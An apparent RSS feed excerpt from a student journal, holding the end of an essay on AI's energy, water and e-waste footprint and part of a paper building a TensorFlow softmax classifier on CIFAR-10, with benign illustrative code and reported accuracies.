<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1742" height="860" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.52.46-PM.webp" alt="" class="wp-image-4386"/><figcaption class="wp-element-caption">Figure 2: AI Data Centers and Water Use &#8211; Scope 1 and Scope 2. This diagram cleverly reveals the hidden thirst of AI by showing how data centers use water in two critical ways. The Scope 1 path shows direct water use, where water is pumped into a cooling tower to chill the servers that are running intense AI tasks like ChatGPT. The Scope 2 path, however, shows the often overlooked indirect water use, where water is consumed by the power plants generating the electricity that powers the data center. The immense heat from AI&#8217;s powerful chips makes this cooling essential, and a single large data center can consume millions of gallons of water daily, enough to supply a small city. This is a major environmental issue, especially in places like Texas, which are already struggling with severe droughts. This image makes it clear that we can&#8217;t just talk about AI&#8217;s energy footprint; we also have to address its massive and unsustainable demand for water. (How Much Water Does AI Consume?, 2023)</figcaption></figure>






<h4 class="wp-block-heading">The E-waste Challenge </h4>



<p>The rapid pace of AI innovation has created a competition for faster, more powerful computer hardware. This constant cycle of upgrades and replacements is creating a global electronic waste (e-waste) problem. The manufacturing of this hardware also has its own carbon emissions, which are part of a company&#8217;s Scope 3 emissions under the GHG Protocol. </p>



<p>According to the U.N., global e-waste reached a record 62 million metric tons in 2022, equal to the weight of more than 150 Empire State Buildings. This problem is getting worse: e-waste is growing nearly five times faster than documented recycling. The total amount of e-waste is projected to grow to 82 million tons by 2030. (ewastemonitor, 2024) In a high-usage scenario, the spread of large language models alone is expected to generate an extra 2.5 million tons of e-waste annually by 2030. This waste is especially dangerous because it contains harmful materials like lead and mercury that can damage both human health and the environment if not properly handled. </p>



<p>Adding to the problem is a significant lack of transparency. Only about a quarter of data center operators track what happens to their retired hardware, and even fewer measure the e-waste they generate. This data gap means that tons of valuable and hazardous equipment often end up in landfills, and there is little accountability or incentive for companies to improve their practices. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1618" height="1398" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.54.01-PM.webp" alt="" class="wp-image-4387"/><figcaption class="wp-element-caption">Figure 3: The Global E-waste Monitor. This chart is a clear visual representation of a global crisis: our planet is drowning in electronic waste. The dark grey bars show the staggering amount of e-waste generated per person in different regions, while the light green bars reveal the alarmingly small amount of that waste that is actually collected and recycled. This growing gap shows that e-waste is piling up almost five times faster than we can deal with it. AI is a major driver of this problem because it demands a constant cycle of hardware upgrades, creating a &#8220;mountain of e-waste&#8221; that is filled with toxic materials like lead and mercury. The lack of transparency in the industry, where few companies track their retired hardware, means much of this hazardous equipment ends up in landfills. This figure powerfully illustrates that AI&#8217;s rapid innovation cycle is not just a technological challenge but an urgent environmental one. (Global E-Waste Monitor 2024, 2024) </figcaption></figure>



<h2 class="wp-block-heading">Discussion </h2>



<p>While the environmental challenges of AI are significant, a new movement is underway to build a more sustainable future for this technology. This effort involves a combination of smarter technology, better operational strategies, and new rules to guide the industry. </p>



<h4 class="wp-block-heading">Innovations in &#8220;Green AI&#8221; </h4>



<p>The movement toward &#8220;Green AI&#8221; starts with making the technology itself more efficient. A key part of this is model optimization, where techniques like pruning (removing unnecessary parts of a model) and knowledge distillation (transferring learning from a large model to a smaller one) dramatically reduce the energy needed for AI workloads. For example, researchers have developed tools that can predict a model’s accuracy early in its training, which can save up to 80% of the computing power that would have otherwise been used on a less effective model. </p>
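

<p>To make the pruning idea concrete, the following is a minimal Python sketch (not drawn from any of the sources cited here) of magnitude-based weight pruning; the 90% sparsity target and the random weight matrix are illustrative assumptions.</p>



<pre class="wp-block-code"><code>import numpy as np

def magnitude_prune(weights, sparsity=0.9):
    """Zero out the smallest-magnitude weights.

    A layer whose weights are mostly zero needs far fewer
    multiply-accumulate operations, which is one route to the
    energy savings that "Green AI" aims for.
    """
    threshold = np.quantile(np.abs(weights), sparsity)
    mask = np.abs(weights) >= threshold
    return weights * mask

# Illustrative example: a random 512x512 dense layer.
rng = np.random.default_rng(0)
w = rng.normal(size=(512, 512))
w_pruned = magnitude_prune(w, sparsity=0.9)
print("nonzero fraction:", np.count_nonzero(w_pruned) / w_pruned.size)</code></pre>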



<p>Developers are also creating new, energy-efficient hardware. Beyond traditional GPUs, new types of chips, such as neuromorphic and optical processors, are being designed to run AI tasks with far less power. Additionally, a method called &#8220;power capping&#8221; can be used to limit the electricity sent to processors, which can cut energy use by about 20% with no loss in performance. </p>



<p>Smarter operational strategies are also key. This includes scheduling large computing tasks to run at night when energy demand on the grid is low, or distributing workloads across different time zones to use power when renewable energy like wind and solar is most available. It also means using simpler AI models when they are sufficient for a task, such as a model that runs locally on a user’s device instead of one in a massive data center. (AI Has High Data Center Energy Costs — but There Are Solutions, 2025) </p>
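

<p>As a rough illustration of the scheduling idea (a sketch only; the hourly forecast values below are made up, not real grid data), a deferrable training job can simply be assigned to the forecast hour with the lowest grid carbon intensity:</p>



<pre class="wp-block-code"><code># Carbon-aware scheduling sketch: defer a batch job to the
# forecast hour with the lowest grid carbon intensity.
# The forecast values below are illustrative, not real data.

forecast_gco2_per_kwh = {
    0: 210, 3: 160, 6: 140,    # night/early morning: more wind on the grid
    9: 300, 12: 250, 15: 320,  # midday and afternoon
    18: 380, 21: 290,          # evening peak
}

def best_start_hour(forecast):
    """Return the hour whose forecast carbon intensity is lowest."""
    return min(forecast, key=forecast.get)

hour = best_start_hour(forecast_gco2_per_kwh)
print(f"Schedule deferrable AI workload at {hour:02d}:00 "
      f"({forecast_gco2_per_kwh[hour]} gCO2/kWh)")</code></pre>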



<h4 class="wp-block-heading">The Role of Renewable Energy and Advanced Cooling </h4>



<p>To power the vast data centers that form the backbone of AI, a global shift to clean energy is crucial. Experts predict that by 2030, about half of the electricity used by data centers will come from renewable sources. (Energy Supply for AI, 2025) AI itself can even assist in this transition by forecasting how much renewable energy will be produced at any given time, allowing for better energy management. </p>



<p>Cooling accounts for a large share of a data center&#8217;s energy and water consumption, so new solutions are emerging here as well. Advanced cooling systems like liquid cooling are thousands of times more efficient at removing heat than air, allowing for more powerful hardware in a smaller space while using less energy. Another smart strategy is placing data centers in naturally cold climates, like in Finland, to use outside air or cold seawater for &#8220;free cooling.&#8221; </p>



<h4 class="wp-block-heading">Policy and Standardization Efforts</h4>



<p> For these solutions to have a global impact, they must be backed by clear rules and standards. Over 190 countries have agreed on guidelines for ethical AI, including its environmental aspects. Both the European Union and the United States have introduced legislation aimed at managing AI’s environmental footprint. A U.S. Executive Order, for instance, directs the Department of Energy to create reporting requirements for data centers that cover a technology’s full lifecycle, from manufacturing to disposal. </p>



<p>These efforts aim to create new, transparent metrics for the industry. The &#8220;AI Energy Score&#8221; is one idea, which is a simple, star-based rating system to show how energy-efficient an AI model is for a specific task. The International Organization for Standardization (ISO) is also preparing new standards for &#8220;sustainable AI&#8221; that will cover energy, water, and materials. The goal of these policies is to require developers and companies to measure and publicly share their environmental impacts and to integrate these metrics into existing sustainability reports like the Greenhouse Gas (GHG) Protocol. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1904" height="1058" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.56.47-PM.webp" alt="" class="wp-image-4388"/><figcaption class="wp-element-caption">Figure 4: GHG Protocol Scopes and Emissions Across the Value Chain. This diagram is a crucial tool for understanding the full environmental impact of a company, including those in the AI sector. It breaks down greenhouse gas emissions into three key categories: Scope 1 (direct emissions from a company’s own vehicles and facilities), Scope 2 (indirect emissions from the electricity they purchase), and Scope 3 (all other indirect emissions across their supply chain). This framework is critical because it forces companies to look beyond just their direct operations to the entire lifecycle of their technology, including the emissions from manufacturing the hardware and disposing of it as e-waste. This chart highlights the importance of transparency, showing why it&#8217;s so easy for companies to hide their true carbon footprint by only focusing on a small part of their total emissions, creating a situation where they seem greener than they really are. (GHG Protocol Scopes and Emissions Across the Value Chain, 2024) </figcaption></figure>



<h2 class="wp-block-heading">Conclusion </h2>



<p>The rapid growth of AI is driving a significant surge in demand for energy, water, and hardware; however, our ability to measure and manage this impact is often hindered by a lack of transparency. The industry has frequently used outdated metrics or misleading reporting, which makes it hard to hold companies accountable for their actual environmental footprint. This has created a situation where companies are not strongly motivated to make their models more energy-efficient because there are no clear standards to do so. AI affects many areas, including energy use, water supplies, and e-waste, and these impacts grow as AI models run constantly and get upgraded quickly. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1622" height="1386" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.57.38-PM.webp" alt="" class="wp-image-4389"/><figcaption class="wp-element-caption">Figure 5: The Integrated Pathway to a Sustainable AI Future. This final diagram provides a hopeful roadmap for the future. It shows that creating a sustainable AI industry is not something that a single group can achieve alone. Instead, it requires a collaborative effort where Individuals (as users and citizens), Technology (developers and companies), and Government (policymakers) work together. The arrows show how these three groups must influence each other: new technology can create a need for new legislation, while government policies and standards can guide the development of technology in a more sustainable direction. This is the solution to the problems of energy, water, and e-waste, demonstrating that a future where AI is both powerful and sustainable is possible through a combined approach of smarter technology and clear, effective policy. It reminds us that our collective actions, from our behaviors to our political requests, can drive meaningful change for the environment. (Vinuesa et al., 2020) </figcaption></figure>



<p>The path forward requires an integrated approach that combines new technology with clear policy. We can make AI more sustainable by using smarter model designs, more efficient hardware, and innovative cooling methods. At the same time, policies that require companies to provide clear and honest information about AI&#8217;s environmental impact are essential to create balanced conditions and hold companies accountable. This combined effort is vital to ensure that the AI revolution is not only powerful and transformative but also sustainable for our planet and future generations. </p>



<h2 class="wp-block-heading">References </h2>



<p>AI has high data center energy costs—But there are solutions. (2025, January 7). https://mitsloan.mit.edu/ideas-made-to-matter/ai-has-high-data-center-energy-costs-there-are-solutions </p>



<p>Chen, S. (2025). Data centres will use twice as much energy by 2030. Nature. https://doi.org/10.1038/d41586-025-01113-z </p>



<p>Electronic Waste Rising Five Times Faster than Documented E-waste Recycling. (2024). https://unitar.org/about/news-stories/press/global-e-waste-monitor-2024-electronic-waste-rising-five-times-faster-documented-e-waste-recycling </p>



<p>Energy supply for AI. (2025). IEA. https://www.iea.org/reports/energy-and-ai/energy-supply-for-ai </p>



<p>ewastemonitor. (2024, March 20). The Global E-waste Monitor. E-Waste Monitor. https://ewastemonitor.info/the-global-e-waste-monitor-2024/ </p>



<p>GHG Protocol Scopes and Emissions Across the Value Chain. (2024, February 6). Jeff Winter. https://www.jeffwinterinsights.com/insights/scope-emissions-overview </p>



<p>Greenhouse Gas Protocol. (2025). https://ghgprotocol.org/ </p>



<p>How much water does AI consume? (2023, November 30). https://oecd.ai/en/wonk/how-much-water-does-ai-consume </p>



<p>Increase in Electricity Demand from Data Centers. (2024, December 20). Energy.Gov. https://www.energy.gov/articles/doe-releases-new-report-evaluating-increase-electricity-demand-data-centers </p>



<p>Measuring AI’s Energy/Environmental Footprint to Assess Impacts. (2025). Federation of American Scientists. https://fas.org/publication/measuring-and-standardizing-ais-energy-footprint/ </p>



<p>Texas data centers use 50 billion gallons of water. (2025). Newsweek. https://www.newsweek.com/texas-data-center-water-artificial-intelligence-2107500 </p>



<p>The Importance of FLOPS. (2025). https://www.lenovo.com/us/en/glossary/flops/ </p>



<p>Vinuesa, R., Azizpour, H., Leite, I., Balaam, M., Dignum, V., Domisch, S., Felländer, A., Langhans, S. D., Tegmark, M., &amp; Fuso Nerini, F. (2020). The role of artificial intelligence in achieving the Sustainable Development Goals. Nature Communications, 11(1), 233. https://doi.org/10.1038/s41467-019-14108-y </p>



<p>What is Power Usage Effectiveness? (2025). https://www.digitalrealty.com/resources/articles/what-is-power-usage-effectiveness</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Stavros Farsedakis</h5><p>Stavros&#8217; academic interests center on computer science and artificial intelligence, especially exploring how technology impacts the environment. Outside the classroom, he enjoys coding projects and researching ways to make AI more sustainable and efficient.

</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/uncover-the-hidden-environmental-cost-of-ai/">Uncover The Hidden Environmental Cost of AI</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>A Journey into Image Classification: Developing and implementing a custom image classifier</title>
		<link>https://exploratiojournal.com/a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier</link>
		
		<dc:creator><![CDATA[Sarikonda Grishmanth Reddy]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 17:13:09 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4095</guid>

					<description><![CDATA[<p>Sarikonda Grishmanth Reddy<br />
DRS International School</p>
<p>The post <a href="https://exploratiojournal.com/a-journey-into-image-classification-developing-and-implementing-a-custom-image-classifier/">A Journey into Image Classification: Developing and implementing a custom image classifier</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Sarikonda&nbsp;Grishmanth Reddy<br><strong>Mentor</strong>: Dr. Eric Fouh<br><em>DRS International School</em></p>
</div></div>



<p>This paper explores the implementation of a softmax classifier for image classification tasks using the CIFAR-10 dataset. The methodology involves using TensorFlow to develop a simple classification pipeline that learns to categorize images into ten classes. Key findings show that the classifier achieved a training accuracy of 43% and a test accuracy of 26.5%, indicating the limitations of the softmax model for complex visual tasks. Despite performance limitations, the project highlights fundamental processes in image classification and suggests pathways for further research using more advanced architectures.</p>



<p>Image classification, a core application of neural networks, enables automated categorization of visual data, making it crucial for a wide range of applications. It converts photos into actionable information, improving decision-making and the effectiveness of healthcare, security, and autonomous systems. This paper details my experience developing and applying a softmax classifier to an image classification task. Here, I highlight the main takeaways and difficulties that emerged while considering areas that may benefit from improvement. In addition to shedding light on the subtler parts of algorithm creation in computer vision, this work should present readers with practical aspects of developing and refining models for image classification through hands-on experiences and technical considerations.</p>



<h2 class="wp-block-heading"><strong>1. Motivation</strong></h2>



<p>The purpose of image recognition, a branch of computer vision, is to give machines a way to categorize and comprehend visual data. It is largely tied to deep learning methods that successfully imitate particular features of human vision [2]. Image recognition mostly involves sophisticated mathematical models that classify and segment pictures, turning visual data into organized information [3]. This transformation is crucial in applications where visual data analysis is essential, like automated healthcare diagnostics, autonomous vehicle navigation, and pattern recognition in security systems. Machine learning methods for image identification can produce highly precise classifications, forming the basis of artificial intelligence systems that identify hierarchical spatial relationships and relational patterns in pictures [4, 5].</p>



<p>Across many scientific and industrial fields, image recognition is vital. In healthcare, image recognition analyzes MRI, CT, and X-ray imagery to assist with diagnosing diseases [1]. These systems use neural networks trained to identify anatomical features and spot anomalies, which helps radiologists and other medical professionals identify and diagnose diseases early [6]. Biometric identification in security systems relies heavily on image recognition, particularly in facial recognition technology, where computers examine facial features to confirm an individual&#8217;s identity [5]. Real-time image recognition is essential for autonomous cars because it can identify and categorize road objects, including lanes, obstructions, and pedestrians, to direct the vehicle&#8217;s reaction [5]. Such uses of image recognition allow for safer and more effective solutions in a variety of industries while also advancing technical capabilities [1].</p>



<h4 class="wp-block-heading">1.1 <strong>Deep Learning Advancements in Image Recognition</strong></h4>



<p>Deep learning algorithms, particularly convolutional neural networks (CNNs), have been the main driver of image recognition advancements [7]. CNNs are made up of convolutional layers that apply filters to images, enabling neural networks to detect low-level characteristics like edges and textures before moving on to more complex patterns and objects [7]. One prevalent variation is the region-based CNN (R-CNN), which has made object identification much more efficient: it first distinguishes regions of interest before using a CNN to identify objects within those regions [8]. Its notable strengths include adaptability to various object detection and segmentation tasks, such as security surveillance and medical imaging [8]. Another significant model is the You Only Look Once (YOLO) architecture, which is ideal for real-time applications because it detects objects in a single pass over the entire image grid [9].</p>



<h4 class="wp-block-heading">1.2 <strong>Vision Transformers and Emerging Techniques</strong></h4>



<p>Vision transformers (ViTs) are a recent development in image recognition [1]. Originally intended for natural language processing, transformers employ self-attention processes to discover interactions in visual data [1]. By removing the spatial constraints imposed by CNNs, this technique allows the model to &#8220;look at&#8221; significant areas of an image and outperforms CNNs and other approaches at capturing global context within photographs [1]. When trained on huge datasets, ViTs can perform similarly to CNNs or even better in some cases [1].</p>



<h4 class="wp-block-heading"><strong>1.3 Challenges and Ethical Considerations</strong></h4>



<p>Despite tremendous advances, image recognition technology still faces scientific and ethical obstacles. A central scientific challenge is generalization: models trained under highly controlled conditions often fail to handle variations in illumination, perspective, and occlusion [10]. In addition, training complex models requires enormous quantities of data and processing power, which makes scaling extremely difficult in contexts with limited resources [10]. There are ethical concerns as well, particularly with regard to facial recognition technology, which faces difficulties with algorithmic bias, privacy, and data security [10]. Bias in training sets may produce discriminatory results, especially when algorithms perform poorly for specific demographic groups, raising social concerns about the use of AI in sensitive areas [10].</p>



<h4 class="wp-block-heading">1.4 <strong>Future Directions in Image Recognition Research</strong></h4>



<p>Future image recognition research will likely focus on learning algorithms that work well with fewer labeled examples, using methods like semi-supervised and unsupervised learning [11]. Techniques like Generative Adversarial Networks (GANs) for creating realistic training data will be investigated to address the issue of scarce data and strengthen models [11]. In short, image recognition is at the state of the art of AI research, using scientific advancements to enable machines to understand the visual world and offering enormous transformational potential in a variety of scientific and industrial applications.</p>



<h2 class="wp-block-heading"><strong>2. Implementation</strong></h2>



<p>One of the key elements of image classification models, and even more crucial for deep learning architectures, is the softmax classifier, which carries out the final activation function that converts neural network outputs into probability distributions across several classes. Mathematically, the softmax function takes the exponential of each raw score, or &#8220;logit,&#8221; emerging from the final layer of the network and normalizes them by their sum. Because the resulting probabilities of all classes sum to one, the outputs form a proper probability distribution suitable for multi-class classification. The softmax classifier gives a probability to each potential class for every input picture, with the highest probability denoting the model&#8217;s forecast of the most likely class.</p>



<p>The softmax classifier proved highly helpful in providing a probabilistic interpretation of the output, useful for measuring the model&#8217;s confidence, particularly for models trained on multi-class datasets like CIFAR-10 [2] or ImageNet. During training, softmax is employed in conjunction with a cross-entropy loss, which quantifies the distance between the predicted probability distribution and the true distribution (a one-hot vector for the true label). By iteratively lowering this loss, the model increases its classification accuracy. Softmax classifiers successfully complete the majority of typical image classification tasks, although they can perform poorly when inputs are ambiguous or classes overlap. Therefore, temperature scaling or other calibration techniques are occasionally used to make the output distributions from softmax less confident and more interpretable in real-world applications.</p>
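

<p>A minimal NumPy sketch of these formulas, added for illustration (separate from the TensorFlow program described below; the logits are made-up numbers), shows the softmax function, the cross-entropy loss against an integer true label, and temperature scaling:</p>



<pre class="wp-block-code"><code>import numpy as np

def softmax(logits, temperature=1.0):
    """Convert raw logits into probabilities that sum to one.

    Subtracting the max logit first is a standard numerical-stability
    trick; temperature &gt; 1 softens the distribution (the calibration
    idea mentioned above).
    """
    z = np.asarray(logits, dtype=float) / temperature
    z -= z.max()
    exp_z = np.exp(z)
    return exp_z / exp_z.sum()

def cross_entropy(probs, true_class):
    """Negative log-probability assigned to the true class."""
    return -np.log(probs[true_class])

logits = [2.0, 0.5, -1.0]                # made-up scores for 3 classes
p = softmax(logits)
print(p, p.sum())                        # probabilities summing to 1
print(cross_entropy(p, true_class=0))    # low loss when class 0 is correct
print(softmax(logits, temperature=2.0))  # softer, less confident output</code></pre>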



<p>Specifically designed for training artificial intelligence models on image classification problems, CIFAR-10 [2] has become one of the most widely used benchmarks in computer vision. Divided into 50,000 training images and 10,000 test images, CIFAR-10 [2] offers a rigorous way to assess model performance. It consists of 60,000 color images at a resolution of 32&#215;32 pixels. The set&#8217;s images are hand-labeled into 10 mutually exclusive classes: airplanes, cars, birds, cats, deer, dogs, frogs, horses, ships, and trucks. Because these classes cover a wide range of object categories, CIFAR-10 [2] is a good tool for evaluating how effectively models generalize across different visual attributes.</p>



<p>One of CIFAR-10&#8217;s intriguing aspects is its very low picture resolution, which pushes models to extract pertinent features from a small number of pixels. This rewards feature-extraction capacity rather than the gathering of high-resolution detail. Because CNNs are adept at spotting spatial hierarchies in visual data, the dataset is particularly useful for assessing them. To improve sample diversity and prevent overfitting, the CIFAR-10 dataset is frequently augmented during training using methods including cropping, horizontal flipping, and even color jittering, as sketched below. Additionally, the categorical character of the dataset fits naturally with probability-based classification losses like cross-entropy in networks with a softmax output layer. CIFAR-10 is thus a standard dataset in machine learning research.</p>
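

<p>Here is a minimal sketch of two of these augmentations (illustrative only; the fake image, the padding amount, and the 50% flip probability are assumptions, not parameters taken from the project):</p>



<pre class="wp-block-code"><code>import numpy as np

def augment(image, rng, pad=4):
    """Random horizontal flip plus a random crop after zero-padding.

    image: (32, 32, 3) uint8 array, as in CIFAR-10.
    """
    if rng.random() &lt; 0.5:
        image = image[:, ::-1, :]                   # horizontal flip
    padded = np.pad(image, ((pad, pad), (pad, pad), (0, 0)))
    top = rng.integers(0, 2 * pad + 1)
    left = rng.integers(0, 2 * pad + 1)
    return padded[top:top + 32, left:left + 32, :]  # random 32x32 crop

rng = np.random.default_rng(0)
fake_image = rng.integers(0, 256, size=(32, 32, 3), dtype=np.uint8)
augmented = augment(fake_image, rng)
print(augmented.shape)  # (32, 32, 3)</code></pre>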



<h4 class="wp-block-heading"><strong>2.1: Explaining the code</strong></h4>



<p>This code implements a softmax classifier for the CIFAR-10[2] dataset using TensorFlow&#8217;s[1] version 1 framework to perform image classification. First, it imports essential libraries and modules, including numpy for numerical operations, tensorflow.compat.v1 (with v2 features disabled for compatibility with older TensorFlow code), and a helper module data_helpers for loading the CIFAR-10[2] dataset. Basic parameters like batch size, learning rate, and number of training steps (max_steps) are defined for controlling the training process. The code begins by loading the CIFAR-10 dataset through data_helpers.load_data(), storing training and test images and labels.</p>



<p>The TensorFlow[1] computational graph is then defined, starting with placeholders for input images and labels. Each image is flattened to a vector of 3072 values (32x32x3), and there are 10 possible classes in the CIFAR-10[2] dataset. The classifier parameters consist of weights and biases, both initialized to zero, which will be optimized during training. The logits calculation (tf.matmul(images_placeholder, weights) + biases) represents the unnormalized scores for each class. The loss function, tf.nn.sparse_softmax_cross_entropy_with_logits, calculates the softmax cross-entropy between logits and true labels, producing a mean loss over the batch. To minimize this loss, the GradientDescentOptimizer is used with the specified learning rate.</p>



<p>The model&#8217;s accuracy is determined by comparing predicted labels to true labels with tf.equal and averaging correct predictions over the batch. In the training loop, random mini-batches of images and labels are drawn, and the model&#8217;s accuracy is printed every 100 steps. After completing all training steps, the model’s accuracy on the test set is calculated and printed. Finally, the code measures and prints the total runtime of the script, making it easy to track the computational efficiency of the training process.</p>
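

<p>Since the script itself is not reproduced in this paper, the listing below is a reconstruction of the pipeline just described, not the original code: it substitutes tf.keras.datasets.cifar10 for the data_helpers module, and the batch size and learning rate are assumed values consistent with the text (1,000 steps, accuracy printed every 100 steps).</p>



<pre class="wp-block-code"><code>import time
import numpy as np
import tensorflow.compat.v1 as tf

tf.disable_v2_behavior()  # use the graph-mode TF1 API described above

# Hyperparameters (assumed values consistent with the description).
batch_size = 100
learning_rate = 0.005
max_steps = 1000

# Load CIFAR-10 via Keras in place of the paper's data_helpers module;
# flatten each 32x32x3 image into a 3072-vector scaled to [0, 1].
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
x_train = x_train.reshape(-1, 3072).astype(np.float32) / 255.0
x_test = x_test.reshape(-1, 3072).astype(np.float32) / 255.0
y_train = y_train.flatten().astype(np.int64)
y_test = y_test.flatten().astype(np.int64)

# Placeholders for a batch of flattened images and their integer labels.
images_placeholder = tf.placeholder(tf.float32, shape=[None, 3072])
labels_placeholder = tf.placeholder(tf.int64, shape=[None])

# Weights and biases initialized to zero, as described in Section 2.1.
weights = tf.Variable(tf.zeros([3072, 10]))
biases = tf.Variable(tf.zeros([10]))

# Unnormalized class scores, mean softmax cross-entropy loss, and SGD step.
logits = tf.matmul(images_placeholder, weights) + biases
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
    labels=labels_placeholder, logits=logits))
train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)

# Accuracy: fraction of examples whose argmax prediction matches the label.
correct = tf.equal(tf.argmax(logits, 1), labels_placeholder)
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))

start = time.time()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for step in range(max_steps):
        # Draw a random mini-batch of training images and labels.
        idx = np.random.choice(len(x_train), batch_size, replace=False)
        feed = {images_placeholder: x_train[idx],
                labels_placeholder: y_train[idx]}
        if step % 100 == 0:
            acc = sess.run(accuracy, feed_dict=feed)
            print(f"Step {step:4d}: training accuracy {acc:.2f}")
        sess.run(train_step, feed_dict=feed)

    test_acc = sess.run(accuracy, feed_dict={images_placeholder: x_test,
                                             labels_placeholder: y_test})
    print(f"Test accuracy: {test_acc:.3f}")
print(f"Total runtime: {time.time() - start:.2f} s")</code></pre>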



<h4 class="wp-block-heading"><strong>2.2: Code execution</strong></h4>



<h5 class="wp-block-heading"><strong>2.2.1 Training Procedure</strong></h5>



<p>In training, the code employs a softmax classifier. A softmax classifier is a generalization of logistic regression that is often deployed to handle multi-class classification problems. The steps adopted during the training procedure are as follows:</p>



<p>Initialization of Weights: In the first step, we initialize the weights and biases of the softmax classifier (usually to small random values or zeros). The weights represent the &#8220;knowledge&#8221; of the model and will be adjusted during training for best performance.</p>



<p>Forward pass: The model produces predictions for each input batch of images by taking the weighted sum of the inputs followed by the softmax activation, generating probabilities for each class. In other words, it essentially assigns a probability to each class (&#8220;dog,&#8221; &#8220;cat,&#8221; and so on in CIFAR-10 [2]) for each image.</p>



<p>Loss Calculation: The code uses a loss function called cross-entropy, which measures how well the model&#8217;s predicted probabilities of the class labels compare to the actual class labels. The loss value is high if there is a big difference between the predictions and the correct answers, and low otherwise.</p>



<p>Backpropagation and Gradient Descent: The model calculates the gradients, which specify how the weights should be updated to minimize the loss. Then, it uses gradient descent to update the weights, analogous to taking a series of small steps toward reducing the error. In this code, tf.train.GradientDescentOptimizer carries out these updates. The learning rate is the step size: a small learning rate brings slower learning, whereas a large learning rate might induce instability.</p>
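

<p>To make the update rule concrete, here is a from-scratch NumPy version of a single training step (an illustration, separate from the TensorFlow program): for softmax with cross-entropy, the gradient of the loss with respect to the logits is simply the predicted probabilities minus the one-hot encoding of the true labels.</p>



<pre class="wp-block-code"><code>import numpy as np

def train_step(W, b, X, y, lr=0.005):
    """One gradient-descent step for a softmax classifier.

    X: (batch, features) images; y: (batch,) integer labels.
    For softmax + cross-entropy, dLoss/dlogits = probs - one_hot(y).
    """
    logits = X @ W + b                              # forward pass
    logits -= logits.max(axis=1, keepdims=True)     # numerical stability
    probs = np.exp(logits)
    probs /= probs.sum(axis=1, keepdims=True)

    probs[np.arange(len(y)), y] -= 1.0              # probs - one_hot(y)
    grad_W = X.T @ probs / len(y)                   # average over the batch
    grad_b = probs.mean(axis=0)

    return W - lr * grad_W, b - lr * grad_b

# Tiny illustrative batch: 4 fake "images" with 3072 features, 10 classes.
rng = np.random.default_rng(0)
W = np.zeros((3072, 10)); b = np.zeros(10)
X = rng.random((4, 3072)); y = np.array([3, 1, 7, 3])
W, b = train_step(W, b, X, y)</code></pre>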



<p>Monitoring Accuracy: The program outputs the training accuracy every 100 steps. Training accuracy is the percentage of accurate predictions on the training dataset at every step. Here&#8217;s how it goes:</p>



<p>Step 0: Training accuracy starts very low at 0.07 (7%), meaning the model is nearly just guessing.</p>



<p>This gradually increases at each step to about 0.43 (43%) at step 900, indicating it is learning, though the improvement is quite slow, which is expected of a simple softmax model on such a complex dataset.</p>



<p>The learning curve is a gentle ascent as the model learns, adjusting its weights based on the training data to improve class label predictions. However, the final training accuracy is still less than 50%, which indicates that the model cannot fit the data accurately, most likely because of the simplicity of the softmax model relative to the complexity of the CIFAR-10 [2] dataset.</p>



<h5 class="wp-block-heading"><strong>2.2.2 Test Accuracy</strong>&nbsp;</h5>



<p>After the training process, the code tests the model on the test dataset, composed of images the model has not encountered during training. This shows whether the model generalizes well to new data. The final test accuracy of this run is 0.265, or 26.5%, meaning the model correctly classifies only approximately 26.5% of the images in the test set.</p>



<p>The most probable reasons for this very low test accuracy are:</p>



<p>Model Simplicity: A softmax classifier is a fairly simple linear model; it works fine for linearly separable data, but it does not work well when the patterns become more complex. The CIFAR-10 collection contains 10 diverse categories of low-resolution images that require more advanced feature extraction.</p>



<p>Overfitting Risk: Although this result does not indicate overfitting, a training accuracy much higher than the test accuracy would suggest that the model is overfitting (memorizing training data instead of generalizing). In the present case, both training and test accuracies are low, which instead points to underfitting: the model hasn&#8217;t captured enough of the data patterns.</p>



<p>More complex models than a softmax classifier, for example, CNNs, are often required to handle spatial patterns in the case of CIFAR-10 and deliver better performance.</p>



<h5 class="wp-block-heading"><strong>2.2.3 Execution Time</strong></h5>



<p>The execution time shown here is 5.77 seconds, which represents the time taken by this model to train and evaluate completely on the CPU. Here are some reasons for this time:</p>



